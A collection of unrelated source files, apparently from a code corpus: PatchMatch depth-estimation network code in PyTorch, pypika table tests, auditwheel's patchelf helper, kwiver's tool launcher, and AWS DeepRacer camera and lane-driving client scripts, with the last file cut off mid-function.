depth_sample = torch.arange(-self.patchmatch_num_sample//2, self.patchmatch_num_sample//2, 1,
device=device).view(1, self.patchmatch_num_sample, 1, 1).repeat(batch_size,
1, height, width).float()
inverse_depth_interval = (inverse_min_depth - inverse_max_depth) * depth_interval_scale
inverse_depth_interval = inverse_depth_interval.view(batch_size,1,1,1)
depth_sample = 1.0 / depth.detach() + inverse_depth_interval * depth_sample
depth_clamped = []
del depth
for k in range(batch_size):
depth_clamped.append(torch.clamp(depth_sample[k], min=inverse_max_depth[k], max=inverse_min_depth[k]).unsqueeze(0))
depth_sample = 1.0 / torch.cat(depth_clamped,dim=0)
del depth_clamped
return depth_sample
class Propagation(nn.Module):
def __init__(self, neighbors = 16):
super(Propagation, self).__init__()
self.neighbors = neighbors
def forward(self, batch, height, width, depth_sample, grid, depth_min, depth_max, depth_interval_scale):
# [B,D,H,W]
num_depth = depth_sample.size()[1]
propogate_depth = depth_sample.new_empty(batch, num_depth + self.neighbors, height, width)
propogate_depth[:,0:num_depth,:,:] = depth_sample
propogate_depth_sample = F.grid_sample(depth_sample[:, num_depth // 2,:,:].unsqueeze(1),
grid,
mode='bilinear',
padding_mode='border')
del grid
propogate_depth_sample = propogate_depth_sample.view(batch, self.neighbors, height, width)
propogate_depth[:,num_depth:,:,:] = propogate_depth_sample
del propogate_depth_sample
# sort
propogate_depth, _ = torch.sort(propogate_depth, dim=1)
return propogate_depth
class Evaluation(nn.Module):
def __init__(self, G=8, stage=3, evaluate_neighbors=9, iterations=2):
super(Evaluation, self).__init__()
self.iterations = iterations
self.G = G
self.stage = stage
if self.stage == 3:
self.pixel_wise_net = PixelwiseNet(self.G)
self.similarity_net = SimilarityNet(self.G, evaluate_neighbors)
def forward(self, ref_feature, src_features, ref_proj, src_projs, depth_sample, depth_min, depth_max, iter, grid=None, weight=None, view_weights=None):
num_src_features = len(src_features)
num_src_projs = len(src_projs)
batch, feature_channel, height, width = ref_feature.size()
device = ref_feature.get_device()
num_depth = depth_sample.size()[1]
assert num_src_features == num_src_projs, "Patchmatch Evaluation: Different number of images and projection matrices"
if view_weights != None:
assert num_src_features == view_weights.size()[1], "Patchmatch Evaluation: Different number of images and view weights"
pixel_wise_weight_sum = 0
ref_feature = ref_feature.view(batch, self.G, feature_channel//self.G, height, width)
similarity_sum = 0
if self.stage == 3 and view_weights == None:
view_weights = []
for src_feature, src_proj in zip(src_features, src_projs):
warped_feature = differentiable_warping(src_feature, src_proj, ref_proj, depth_sample)
warped_feature = warped_feature.view(batch, self.G, feature_channel//self.G, num_depth, height, width)
# group-wise correlation
similarity = (warped_feature * ref_feature.unsqueeze(3)).mean(2)
# pixel-wise view weight
view_weight = self.pixel_wise_net(similarity)
view_weights.append(view_weight)
if self.training:
similarity_sum = similarity_sum + similarity * view_weight.unsqueeze(1) # [B, G, Ndepth, H, W]
pixel_wise_weight_sum = pixel_wise_weight_sum + view_weight.unsqueeze(1) #[B,1,1,H,W]
else:
similarity_sum += similarity*view_weight.unsqueeze(1)
pixel_wise_weight_sum += view_weight.unsqueeze(1)
del warped_feature, src_feature, src_proj, similarity, view_weight
del src_features, src_projs
view_weights = torch.cat(view_weights,dim=1) #[B,4,H,W], 4 is the number of source views
# aggregated matching cost across all the source views
similarity = similarity_sum.div_(pixel_wise_weight_sum)
del ref_feature, pixel_wise_weight_sum, similarity_sum
# adaptive spatial cost aggregation
score = self.similarity_net(similarity, grid, weight)
del similarity, grid, weight
# apply softmax to get probability
softmax = nn.LogSoftmax(dim=1)
score = softmax(score)
score = torch.exp(score)
# depth regression: expectation
depth_sample = torch.sum(depth_sample * score, dim = 1)
return depth_sample, score, view_weights.detach()
else:
i=0
for src_feature, src_proj in zip(src_features, src_projs):
warped_feature = differentiable_warping(src_feature, src_proj, ref_proj, depth_sample)
warped_feature = warped_feature.view(batch, self.G, feature_channel//self.G, num_depth, height, width)
similarity = (warped_feature * ref_feature.unsqueeze(3)).mean(2)
# reuse the pixel-wise view weight from first iteration of Patchmatch on stage 3
view_weight = view_weights[:,i].unsqueeze(1) #[B,1,H,W]
i=i+1
if self.training:
similarity_sum = similarity_sum + similarity * view_weight.unsqueeze(1) # [B, G, Ndepth, H, W]
pixel_wise_weight_sum = pixel_wise_weight_sum + view_weight.unsqueeze(1) #[B,1,1,H,W]
else:
similarity_sum += similarity*view_weight.unsqueeze(1)
pixel_wise_weight_sum += view_weight.unsqueeze(1)
del warped_feature, src_feature, src_proj, similarity, view_weight
del src_features, src_projs
# [B, G, Ndepth, H, W]
similarity = similarity_sum.div_(pixel_wise_weight_sum)
del ref_feature, pixel_wise_weight_sum, similarity_sum
score = self.similarity_net(similarity, grid, weight)
del similarity, grid, weight
softmax = nn.LogSoftmax(dim=1)
score = softmax(score)
score = torch.exp(score)
if self.stage == 1 and iter == self.iterations:
# depth regression: inverse depth regression
depth_index = torch.arange(0, num_depth, 1, device=device).view(1, num_depth, 1, 1)
depth_index = torch.sum(depth_index * score, dim = 1)
inverse_min_depth = 1.0 / depth_sample[:,-1,:,:]
inverse_max_depth = 1.0 / depth_sample[:,0,:,:]
depth_sample = inverse_max_depth + depth_index / (num_depth - 1) * \
(inverse_min_depth - inverse_max_depth)
depth_sample = 1.0 / depth_sample
return depth_sample, score
# depth regression: expectation
else:
depth_sample = torch.sum(depth_sample * score, dim = 1)
return depth_sample, score
class PatchMatch(nn.Module):
def __init__(self, random_initialization = False, propagation_out_range = 2,
patchmatch_iteration = 2, patchmatch_num_sample = 16, patchmatch_interval_scale = 0.025,
num_feature = 64, G = 8, propagate_neighbors = 16, stage=3, evaluate_neighbors=9):
super(PatchMatch, self).__init__()
self.random_initialization = random_initialization
self.depth_initialization = DepthInitialization(patchmatch_num_sample)
self.propagation_out_range = propagation_out_range
self.propagation = Propagation(propagate_neighbors)
self.patchmatch_iteration = patchmatch_iteration
self.patchmatch_interval_scale = patchmatch_interval_scale
self.propa_num_feature = num_feature
# group wise correlation
self.G = G
self.stage = stage
self.dilation = propagation_out_range
self.propagate_neighbors = propagate_neighbors
self.evaluate_neighbors = evaluate_neighbors
self.evaluation = Evaluation(self.G, self.stage, self.evaluate_neighbors, self.patchmatch_iteration)
# adaptive propagation
if self.propagate_neighbors > 0:
# last iteration on stage 1 does not have propagation (photometric consistency filtering)
if not (self.stage == 1 and self.patchmatch_iteration == 1):
self.propa_conv = nn.Conv2d(
self.propa_num_feature,
2 * self.propagate_neighbors,
kernel_size=3,
stride=1,
padding=self.dilation,
dilation=self.dilation,
bias=True)
nn.init.constant_(self.propa_conv.weight, 0.)
nn.init.constant_(self.propa_conv.bias, 0.)
# adaptive spatial cost aggregation (adaptive evaluation)
self.eval_conv = nn.Conv2d(self.propa_num_feature, 2 * self.evaluate_neighbors, kernel_size=3, stride=1,
padding=self.dilation, dilation=self.dilation, bias=True)
nn.init.constant_(self.eval_conv.weight, 0.)
nn.init.constant_(self.eval_conv.bias, 0.)
self.feature_weight_net = FeatureWeightNet(num_feature, self.evaluate_neighbors, self.G)
# compute the offset for adaptive propagation
def get_propagation_grid(self, batch, height, width, offset, device, img=None):
if self.propagate_neighbors == 4:
original_offset = [ [-self.dilation, 0],
[0, -self.dilation], [0, self.dilation],
[self.dilation, 0]]
elif self.propagate_neighbors == 8:
original_offset = [[-self.dilation, -self.dilation], [-self.dilation, 0], [-self.dilation, self.dilation],
[0, -self.dilation], [0, self.dilation],
[self.dilation, -self.dilation], [self.dilation, 0], [self.dilation, self.dilation]]
elif self.propagate_neighbors == 16:
original_offset = [[-self.dilation, -self.dilation], [-self.dilation, 0], [-self.dilation, self.dilation],
[0, -self.dilation], [0, self.dilation],
[self.dilation, -self.dilation], [self.dilation, 0], [self.dilation, self.dilation]]
for i in range(len(original_offset)):
offset_x, offset_y = original_offset[i]
original_offset.append([2*offset_x, 2*offset_y])
else:
raise NotImplementedError
with torch.no_grad():
y_grid, x_grid = torch.meshgrid([torch.arange(0, height, dtype=torch.float32, device=device),
torch.arange(0, width, dtype=torch.float32, device=device)])
y_grid, x_grid = y_grid.contiguous(), x_grid.contiguous()
y_grid, x_grid = y_grid.view(height * width), x_grid.view(height * width)
xy = torch.stack((x_grid, y_grid)) # [2, H*W]
xy = torch.unsqueeze(xy, 0).repeat(batch, 1, 1) # [B, 2, H*W]
xy_list=[]
for i in range(len(original_offset)):
original_offset_y, original_offset_x = original_offset[i]
offset_x = original_offset_x + offset[:,2*i,:].unsqueeze(1)
offset_y = original_offset_y + offset[:,2*i+1,:].unsqueeze(1)
xy_list.append((xy+torch.cat((offset_x, offset_y), dim=1)).unsqueeze(2))
xy = torch.cat(xy_list, dim=2) # [B, 2, 9, H*W]
del xy_list, x_grid, y_grid
x_normalized = xy[:, 0, :, :] / ((width - 1) / 2) - 1
y_normalized = xy[:, 1, :, :] / ((height - 1) / 2) - 1
del xy
grid = torch.stack((x_normalized, y_normalized), dim=3) # [B, 9, H*W, 2]
del x_normalized, y_normalized
grid = grid.view(batch, self.propagate_neighbors * height, width, 2)
return grid
# compute the offests for adaptive spatial cost aggregation in adaptive evaluation
def get_evaluation_grid(self, batch, height, width, offset, device, img=None):
if self.evaluate_neighbors==9:
dilation = self.dilation-1 #dilation of evaluation is a little smaller than propagation
original_offset = [[-dilation, -dilation], [-dilation, 0], [-dilation, dilation],
[0, -dilation], [0, 0], [0, dilation],
[dilation, -dilation], [dilation, 0], [dilation, dilation]]
elif self.evaluate_neighbors==17:
dilation = self.dilation-1
original_offset = [[-dilation, -dilation], [-dilation, 0], [-dilation, dilation],
[0, -dilation], [0, 0], [0, dilation],
[dilation, -dilation], [dilation, 0], [dilation, dilation]]
for i in range(len(original_offset)):
offset_x, offset_y = original_offset[i]
if offset_x != 0 or offset_y !=0:
original_offset.append([2*offset_x, 2*offset_y])
else:
raise NotImplementedError
with torch.no_grad():
y_grid, x_grid = torch.meshgrid([torch.arange(0, height, dtype=torch.float32, device=device),
torch.arange(0, width, dtype=torch.float32, device=device)])
y_grid, x_grid = y_grid.contiguous(), x_grid.contiguous()
y_grid, x_grid = y_grid.view(height * width), x_grid.view(height * width)
xy = torch.stack((x_grid, y_grid)) # [2, H*W]
xy = torch.unsqueeze(xy, 0).repeat(batch, 1, 1) # [B, 2, H*W]
xy_list=[]
for i in range(len(original_offset)):
original_offset_y, original_offset_x = original_offset[i]
offset_x = original_offset_x + offset[:,2*i,:].unsqueeze(1)
offset_y = original_offset_y + offset[:,2*i+1,:].unsqueeze(1)
xy_list.append((xy+torch.cat((offset_x, offset_y), dim=1)).unsqueeze(2))
xy = torch.cat(xy_list, dim=2) # [B, 2, 9, H*W]
del xy_list, x_grid, y_grid
x_normalized = xy[:, 0, :, :] / ((width - 1) / 2) - 1
y_normalized = xy[:, 1, :, :] / ((height - 1) / 2) - 1
del xy
grid = torch.stack((x_normalized, y_normalized), dim=3) # [B, 9, H*W, 2]
del x_normalized, y_normalized
grid = grid.view(batch, len(original_offset) * height, width, 2)
return grid
def forward(self, ref_feature, src_features, ref_proj, src_projs, depth_min, depth_max,
depth = None, img = None, view_weights = None):
depth_samples = []
device = ref_feature.get_device()
batch, _, height, width = ref_feature.size()
# the learned additional 2D offsets for adaptive propagation
if self.propagate_neighbors > 0:
# last iteration on stage 1 does not have propagation (photometric consistency filtering)
if not (self.stage == 1 and self.patchmatch_iteration == 1):
propa_offset = self.propa_conv(ref_feature)
propa_offset = propa_offset.view(batch, 2 * self.propagate_neighbors, height*width)
propa_grid = self.get_propagation_grid(batch,height,width,propa_offset,device,img)
# the learned additional 2D offsets for adaptive spatial cost aggregation (adaptive evaluation)
eval_offset = self.eval_conv(ref_feature)
eval_offset = eval_offset.view(batch, 2 * self.evaluate_neighbors, height*width)
eval_grid = self.get_evaluation_grid(batch,height,width,eval_offset,device,img)
feature_weight = self.feature_weight_net(ref_feature.detach(), eval_grid)
# first iteration of Patchmatch
iter = 1
if self.random_initialization:
# first iteration on stage 3, random initialization, no adaptive propagation
depth_sample = self.depth_initialization(True, depth_min, depth_max, height, width,
self.patchmatch_interval_scale, device)
# weights for adaptive spatial cost aggregation in adaptive evaluation
weight = depth_weight(depth_sample.detach(), depth_min, depth_max, eval_grid.detach(), self.patchmatch_interval_scale,
self.evaluate_neighbors)
weight = weight * feature_weight.unsqueeze(1)
weight = weight / torch.sum(weight, dim=2).unsqueeze(2)
# evaluation, outputs regressed depth map and pixel-wise view weights which will
# be used for subsequent iterations
depth_sample, score, view_weights = self.evaluation(ref_feature, src_features, ref_proj, src_projs,
depth_sample, depth_min, depth_max, iter, eval_grid, weight, view_weights)
depth_sample = depth_sample.unsqueeze(1)
depth_samples.append(depth_sample)
else:
# subsequent iterations, local perturbation based on previous result
depth_sample = self.depth_initialization(False, depth_min, depth_max,
height, width, self.patchmatch_interval_scale, device, depth)
del depth
# adaptive propagation
if self.propagate_neighbors > 0:
# last iteration on stage 1 does not have propagation (photometric consistency filtering)
if not (self.stage == 1 and iter == self.patchmatch_iteration):
depth_sample = self.propagation(batch, height, width, depth_sample, propa_grid, depth_min, depth_max,
self.patchmatch_interval_scale)
# weights for adaptive spatial cost aggregation in adaptive evaluation
weight = depth_weight(depth_sample.detach(), depth_min, depth_max, eval_grid.detach(), self.patchmatch_interval_scale,
self.evaluate_neighbors)
weight = weight * feature_weight.unsqueeze(1)
weight = weight / torch.sum(weight, dim=2).unsqueeze(2)
# evaluation, outputs regressed depth map
depth_sample, score = self.evaluation(ref_feature, src_features, ref_proj, src_projs,
depth_sample, depth_min, depth_max, iter, eval_grid, weight, view_weights)
depth_sample = depth_sample.unsqueeze(1)
depth_samples.append(depth_sample)
for iter in range(2, self.patchmatch_iteration+1):
# local perturbation based on previous result
depth_sample = self.depth_initialization(False, depth_min, depth_max, height, width, self.patchmatch_interval_scale, device, depth_sample)
# adaptive propagation
if self.propagate_neighbors > 0:
# last iteration on stage 1 does not have propagation (photometric consistency filtering)
if not (self.stage == 1 and iter == self.patchmatch_iteration):
depth_sample = self.propagation(batch, height, width, depth_sample, propa_grid, depth_min, depth_max,
self.patchmatch_interval_scale)
# weights for adaptive spatial cost aggregation in adaptive evaluation
weight = depth_weight(depth_sample.detach(), depth_min, depth_max, eval_grid.detach(), self.patchmatch_interval_scale,
self.evaluate_neighbors)
weight = weight * feature_weight.unsqueeze(1)
weight = weight / torch.sum(weight, dim=2).unsqueeze(2)
# evaluation, outputs regressed depth map
depth_sample, score = self.evaluation(ref_feature, src_features,
ref_proj, src_projs, depth_sample, depth_min, depth_max, iter, eval_grid, weight, view_weights)
depth_sample = depth_sample.unsqueeze(1)
depth_samples.append(depth_sample)
return depth_samples, score, view_weights
# first, do convolution on aggregated cost among all the source views
# second, perform adaptive spatial cost aggregation to get final cost
class SimilarityNet(nn.Module):
def __init__(self, G, neighbors = 9):
super(SimilarityNet, self).__init__()
self.neighbors = neighbors
self.conv0 = ConvBnReLU3D(G, 16, 1, 1, 0)
self.conv1 = ConvBnReLU3D(16, 8, 1, 1, 0)
self.similarity = nn.Conv3d(8, 1, kernel_size=1, stride=1, padding=0)
def forward(self, x1, grid, weight):
# x1: [B, G, Ndepth, H, W], aggregated cost among all the source views with pixel-wise view weight
# grid: position of sampling points in adaptive spatial cost aggregation
# weight: weight of sampling points in adaptive spatial cost aggregation, combination of
# feature weight and depth weight
batch,G,num_depth,height,width = x1.size()
x1 = self.similarity(self.conv1(self.conv0(x1))).squeeze(1)
x1 = F.grid_sample(x1,
grid,
mode='bilinear',
padding_mode='border')
# [B,Ndepth,9,H,W]
x1 = x1.view(batch, num_depth, self.neighbors, height, width)
return torch.sum(x1*weight, dim=2)
# adaptive spatial cost aggregation
# weight based on similarity of features of sampling points and center pixel
class FeatureWeightNet(nn.Module):
def __init__(self, num_feature, neighbors=9, G=8):
super(FeatureWeightNet, self).__init__()
self.neighbors = neighbors
self.G = G
self.conv0 = ConvBnReLU3D(G, 16, 1, 1, 0)
self.conv1 = ConvBnReLU3D(16, 8, 1, 1, 0)
self.similarity = nn.Conv3d(8, 1, kernel_size=1, stride=1, padding=0)
self.output = nn.Sigmoid()
def forward(self, ref_feature, grid):
# ref_feature: reference feature map
# grid: position of sampling points in adaptive spatial cost aggregation
batch,feature_channel,height,width = ref_feature.size()
x = F.grid_sample(ref_feature,
grid,
mode='bilinear',
padding_mode='border')
# [B,G,C//G,H,W]
ref_feature = ref_feature.view(batch, self.G, feature_channel//self.G, height, width)
x = x.view(batch, self.G, feature_channel//self.G, self.neighbors, height, width)
# [B,G,Neighbor,H,W]
x = (x * ref_feature.unsqueeze(3)).mean(2)
del ref_feature
# [B,Neighbor,H,W]
x = self.similarity(self.conv1(self.conv0(x))).squeeze(1)
return self.output(x)
# adaptive spatial cost aggregation
# weight based on depth difference of sampling points and center pixel
def depth_weight(depth_sample, depth_min, depth_max, grid, patchmatch_interval_scale, evaluate_neighbors):
# grid: position of sampling points in adaptive spatial cost aggregation
neighbors = evaluate_neighbors
batch,num_depth,height,width = depth_sample.size()
# normalization
x = 1.0 / depth_sample
del depth_sample
inverse_depth_min = 1.0 / depth_min
inverse_depth_max = 1.0 / depth_max
x = (x-inverse_depth_max.view(batch,1,1,1))/(inverse_depth_min.view(batch,1,1,1)\
-inverse_depth_max.view(batch,1,1,1))
x1 = F.grid_sample(x,
grid,
mode='bilinear',
padding_mode='border')
del grid
x1 = x1.view(batch, num_depth, neighbors, height, width)
# [B,Ndepth,N_neighbors,H,W]
x1 = torch.abs(x1 - x.unsqueeze(2)) / patchmatch_interval_scale
del x
x1 = torch.clamp(x1, min=0, max=4)
# sigmoid output approximate to 1 when x=4
x1 = (-x1 + 2) * 2
output = nn.Sigmoid()
x1 = output(x1)
return x1.detach()
# estimate pixel-wise view weight
class PixelwiseNet(nn.Module):
def __init__(self, G):
super(PixelwiseNet, self).__init__()
self.conv0 = ConvBnReLU3D(G, 16, 1, 1, 0)
self.conv1 = ConvBnReLU3D(16, 8, 1, 1, 0)
self.conv2 = nn.Conv3d(8, 1, kernel_size=1, stride=1, padding=0)
self.output = nn.Sigmoid()
def forward(self, x1):
# x1: [B, G, Ndepth, H, W]
# [B, Ndepth, H, W]
x1 =self.conv2(self.conv1(self.conv0(x1))).squeeze(1)
output = self.output(x1)
del x1
# [B,H,W]
output = torch.max(output, dim=1)[0]
return output.unsqueeze(1)
``` |
{
"source": "johnwmcarneiro/pypika",
"score": 3
} |
#### File: pypika/tests/test_tables.py
```python
import unittest
from pypika import (
Schema,
Table,
Tables
)
__author__ = "<NAME>"
__email__ = "<EMAIL>"
class TableEqualityTests(unittest.TestCase):
def test_tables_equal_by_name(self):
t1 = Table("t")
t2 = Table("t")
self.assertEqual(t1, t2)
def test_tables_equal_by_schema_and_name(self):
t1 = Table("t", schema='a')
t2 = Table("t", schema='a')
self.assertEqual(t1, t2)
def test_tables_equal_by_schema_and_name_using_schema(self):
a = Schema('a')
t1 = Table("t", schema=a)
t2 = Table("t", schema=a)
self.assertEqual(t1, t2)
def test_tables_equal_by_schema_and_name_using_schema_with_parent(self):
parent = Schema('parent')
a = Schema('a', parent=parent)
t1 = Table("t", schema=a)
t2 = Table("t", schema=a)
self.assertEqual(t1, t2)
def test_tables_not_equal_by_schema_and_name_using_schema_with_different_parents(self):
parent = Schema('parent')
a = Schema('a', parent=parent)
t1 = Table("t", schema=a)
t2 = Table("t", schema=Schema('a'))
self.assertNotEqual(t1, t2)
def test_tables_not_equal_with_different_schemas(self):
t1 = Table("t", schema='a')
t2 = Table("t", schema='b')
self.assertNotEqual(t1, t2)
def test_tables_not_equal_with_different_names(self):
t1 = Table("t", schema='a')
t2 = Table("q", schema='a')
self.assertNotEqual(t1, t2)
def test_many_tables_with_alias(self):
tables_data = [('table1', 't1'), ('table2', 't2'), ('table3', 't3')]
tables = Tables(*tables_data)
for el in tables:
self.assertIsNotNone(el.alias)
def test_many_tables_without_alias(self):
tables_data = ['table1', 'table2', 'table3']
tables = Tables(*tables_data)
for el in tables:
self.assertIsNone(el.alias)
def test_many_tables_with_or_not_alias(self):
tables_data = [('table1', 't1'), ('table2'), 'table3']
tables = Tables(*tables_data)
for i in range(len(tables)):
if isinstance(tables_data[i], tuple):
self.assertIsNotNone(tables[i].alias)
else:
self.assertIsNone(tables[i].alias)
``` |
{
"source": "johnwparent/auditwheel",
"score": 2
} |
#### File: auditwheel/auditwheel/patcher.py
```python
import re
from distutils.spawn import find_executable
from subprocess import check_call, check_output, CalledProcessError
class ElfPatcher:
def replace_needed(self,
file_name: str,
so_name: str,
new_so_name: str) -> None:
raise NotImplementedError
def set_soname(self,
file_name: str,
new_so_name: str) -> None:
raise NotImplementedError
def set_rpath(self,
file_name: str,
rpath: str) -> None:
raise NotImplementedError
def get_rpath(self,
file_name: str) -> str:
raise NotImplementedError
def _verify_patchelf() -> None:
"""This function looks for the ``patchelf`` external binary in the PATH,
checks for the required version, and throws an exception if a proper
version can't be found. Otherwise, silcence is golden
"""
if not find_executable('patchelf'):
raise ValueError('Cannot find required utility `patchelf` in PATH')
try:
version = check_output(['patchelf', '--version']).decode("utf-8")
except CalledProcessError:
raise ValueError('Could not call `patchelf` binary')
m = re.match(r'patchelf\s+(\d+(.\d+)?)', version)
if m and tuple(int(x) for x in m.group(1).split('.')) >= (0, 9):
return
raise ValueError(('patchelf %s found. auditwheel repair requires '
'patchelf >= 0.9.') %
version)
class Patchelf(ElfPatcher):
def __init__(self) -> None:
_verify_patchelf()
def replace_needed(self,
file_name: str,
so_name: str,
new_so_name: str) -> None:
check_call(['patchelf', '--replace-needed', so_name, new_so_name,
file_name])
def set_soname(self,
file_name: str,
new_so_name: str) -> None:
check_call(['patchelf', '--set-soname', new_so_name, file_name])
def set_rpath(self,
file_name: str,
rpath: str) -> None:
check_call(['patchelf', '--remove-rpath', file_name])
check_call(['patchelf', '--force-rpath', '--set-rpath',
rpath, file_name])
def get_rpath(self,
file_name: str) -> str:
return check_output(['patchelf', '--print-rpath',
file_name]).decode('utf-8').strip()
```
#### File: tests/integration/test_bundled_wheels.py
```python
import platform
from pathlib import Path
import pytest
from auditwheel.wheel_abi import analyze_wheel_abi
HERE = Path(__file__).parent.resolve()
@pytest.mark.skipif(platform.machine() != 'x86_64', reason='only supported on x86_64')
@pytest.mark.parametrize('file, external_libs', [
('cffi-1.5.0-cp27-none-linux_x86_64.whl', {'libffi.so.5'}),
('python_snappy-0.5.2-pp260-pypy_41-linux_x86_64.whl', {'libsnappy.so.1'}),
])
def test_analyze_wheel_abi(file, external_libs):
winfo = analyze_wheel_abi(str(HERE / file))
assert set(winfo.external_refs['manylinux_2_5_x86_64']['libs']) == external_libs
@pytest.mark.skipif(platform.machine() != 'x86_64', reason='only supported on x86_64')
def test_analyze_wheel_abi_pyfpe():
winfo = analyze_wheel_abi(str(HERE / 'fpewheel-0.0.0-cp35-cp35m-linux_x86_64.whl'))
assert winfo.sym_tag == 'manylinux_2_5_x86_64' # for external symbols, it could get manylinux1
assert winfo.pyfpe_tag == 'linux_x86_64' # but for having the pyfpe reference, it gets just linux
``` |
{
"source": "johnwparent/kwiver",
"score": 2
} |
#### File: python/kwiver/kwiver_tools.py
```python
import os
import subprocess
import kwiver
import sys
from pkg_resources import iter_entry_points
from typing import Dict, List
from kwiver.vital import vital_logging
from kwiver.vital.util.initial_plugin_path import get_initial_plugin_path
KWIVER_BIN_DIR = os.path.join(os.path.dirname(os.path.abspath(kwiver.__file__)), 'bin')
KWIVER_SUPPORTED_TOOLS = ['kwiver', 'plugin_explorer']
logger = vital_logging.getLogger(__name__)
def _setup_environment() -> Dict:
"""
Create a dictionary with environment variables for running kwiver tools.
The dictionary includes appending LD_LIBRARY_PATH, adding path to vital
logging factory to VITAL_LOGGER_FACTORY, and path to default plugins in
KWIVER_PLUGIN_PATH.
Returns:
Dictionary with environment variables used for running tools
"""
# Add additional ld libraries
ld_library_paths = []
for entry_point in iter_entry_points('kwiver.env.ld_library_path'):
ld_library_path = entry_point.load()()
if not os.path.exists(ld_library_path):
logger.warn(f"Invalid path {ld_library_path} specified in {entry_point.name}")
else:
ld_library_paths.append(ld_library_path)
ld_library_path_str = ":".join(ld_library_paths)
# Add logger factories
vital_logger_factory = None
for entry_point in iter_entry_points('kwiver.env.logger_factory', name='vital_log4cplus_logger_factory'):
logger_factory = entry_point.load()()
vital_logger_factory = logger_factory
# Check if LD_LIBRARY_PATH is set to something and append it to the current ld library path
if os.environ.get('LD_LIBRARY_PATH'):
ld_library_path_str += os.environ.get('LD_LIBRARY_PATH')
tool_environment = {
"LD_LIBRARY_PATH": ld_library_path_str,
"VITAL_LOGGER_FACTORY": vital_logger_factory,
"KWIVER_PLUGIN_PATH": get_initial_plugin_path()
}
# Add the remaining environment variables without fiddling with what we have already set
for env_var_name, env_var_val in os.environ.items():
if env_var_name not in tool_environment.keys():
tool_environment[env_var_name] = env_var_val
return tool_environment
def _kwiver_tools(tool_name: str, args: List[str]) -> int:
"""
Configure logging, setup environment and run a subprocess with kwiver tool in it.
Args:
tool_name: Name of the tool that would be run as a subprocess
args: Command line argument provided by the user for the tool
Return:
Return code for the subprocess that runs the tool
"""
vital_logging._configure_logging()
assert tool_name in KWIVER_SUPPORTED_TOOLS, f"Unsupported tool {tool_name} specified"
tool_environment = _setup_environment()
tool_path = os.path.join(KWIVER_BIN_DIR, tool_name)
assert os.path.exists(tool_path), f"Tool {tool_name} not available in {tool_path}"
args.insert(0, tool_path)
subprocess_complete = subprocess.run(args, shell=False, check=False, env=tool_environment)
return subprocess_complete.returncode
def plugin_explorer() -> None:
"""
Console script function for plugin_explorer.
"""
cmd_args = ["--skip-relative"]
cmd_args.extend(sys.argv[1:])
raise SystemExit(_kwiver_tools("plugin_explorer", cmd_args))
def kwiver() -> None:
"""
Console script function for kwiver runner.
"""
raise SystemExit(_kwiver_tools("kwiver", sys.argv[1:]))
``` |
{
"source": "johnwparent/rr_awsdeepracer",
"score": 3
} |
#### File: rr_awsdeepracer/clients/cameraTestClient.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
import threading
from cv_bridge import CvBridge, CvBridgeError
from camera_calibration import CameraCalibration
def WebcamImageToMat(image):
frame2=image.data.reshape([image.height, image.width, 3], order='C')
return frame2
if __name__ == '__main__':
url = 'rr+tcp://localhost:'+sys.argv[1]+'?service=AWSCamera'
print(url)
cam_ctrl = RRN.ConnectService(url)
cam_ctrl.startCamera()
raw_input("Press_enter_to_capture_image: ")
im = cam_ctrl.getCurrentImage()
im_ = WebcamImageToMat(im)
raw_input("Press_enter_to_capture_image: ")
im2 = cam_ctrl.getCurrentImage()
im2_ = WebcamImageToMat(im2)
cv2.imwrite("im1.png",im_)
cv2.imwrite("im2.png",im2_)
raw_input("Press enter to capture lane image: ")
im3 = cam_ctrl.getCurrentImage()
im3_ = WebcamImageToMat(im3)
cv2.imwrite("lane_image.png",im3_)
#cc.cal_main(cam_ctrl)
```
#### File: rr_awsdeepracer/clients/laneDriver.py
```python
import time
import numpy as np
import cv2
import sys
import math
import threading
import logging
#######################REMOVE THE CLIENT IMPORT ##################
import lane_finder
global cam_calibration, calibrate
def compute_steering_angle(frame, lane_lines):
""" Find the steering angle based on lane line coordinate
We assume that camera is calibrated to point to dead center
"""
if len(lane_lines) == 0:
return 0
height, width, _ = frame.shape
if len(lane_lines) == 1:
x1, _, x2, _ = lane_lines[0][0]
x_offset = width - x2
#ensures that with one lane line, we turn the correct direction
if x2 < (0.5*width):
x_offset = 0-abs(x_offset)
if x2 > (0.5*width):
x_offset = 0+abs(x_offset)
else:
_, _, left_x2, _ = lane_lines[0][0]
_, _, right_x2, _ = lane_lines[1][0]
half_width = 0.5 * width
x_offset = half_width - (left_x2 + right_x2) / 2
y_offset = int(height / 2)
angle_to_mid_radian = math.atan(x_offset / y_offset)
angle_to_mid_deg = int(angle_to_mid_radian * 180.0 / math.pi)
steering_angle = angle_to_mid_deg
return steering_angle
def length_of_line_segment(line):
x1, y1, x2, y2 = line
return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)
def stabilize_steering_angle(curr_steering_angle, new_steering_angle, num_of_lane_lines, max_angle_deviation_two_lines=5, max_angle_deviation_one_lane=1):
"""
Using last steering angle to stabilize the steering angle
This can be improved to use last N angles, etc
if new angle is too different from current angle, only turn by max_angle_deviation degrees
"""
if num_of_lane_lines == 2 :
# if both lane lines detected, then we can deviate more
max_angle_deviation = max_angle_deviation_two_lines
else :
# if only one lane detected, don't deviate too much
max_angle_deviation = max_angle_deviation_one_lane
angle_deviation = new_steering_angle - curr_steering_angle
if abs(angle_deviation) > max_angle_deviation:
stabilized_steering_angle = int(curr_steering_angle
+ max_angle_deviation * angle_deviation / abs(angle_deviation))
else:
stabilized_steering_angle = new_steering_angle
return stabilized_steering_angle
class LaneDrive(object):
def __init__(self,servo_ctrl):
self._speed = 0
self._turn = 0
self._obj = False
self._servo = servo_ctrl
self.c_drive_by_angle = 0.0
def drive(self):
if len(self._lane_lines) == 0:
logging.error('No lane lines detected, nothing to do.')
return
new_steering_angle = compute_steering_angle(self._frame, self._lane_lines)
drive_by_angle = stabilize_steering_angle(self.c_drive_by_angle, new_steering_angle, len(self._lane_lines))
self.c_drive_by_angle = (drive_by_angle/33.3333333333)-0.02
if self._servo is not None:
self._servo.Drive(0.65,self.c_drive_by_angle)
def detect_lane(self,frame):
edges,frame_final = lane_finder.iso_lines(frame)
roi = lane_finder.ROI(edges)
lines = lane_finder.find_lines(roi)
lane_lines = lane_finder.average_slope_intercept(frame,lines)
self._lane_lines = lane_lines
self._frame = frame
@property
def lane_lines(self):
return self._lane_lines
@property
def frame(self):
return self._frame
```
#### File: rr_awsdeepracer/clients/lane_finder.py
```python
import time
import numpy as np
import cv2
import sys
import threading
import logging
import math
def iso_lines(frame):
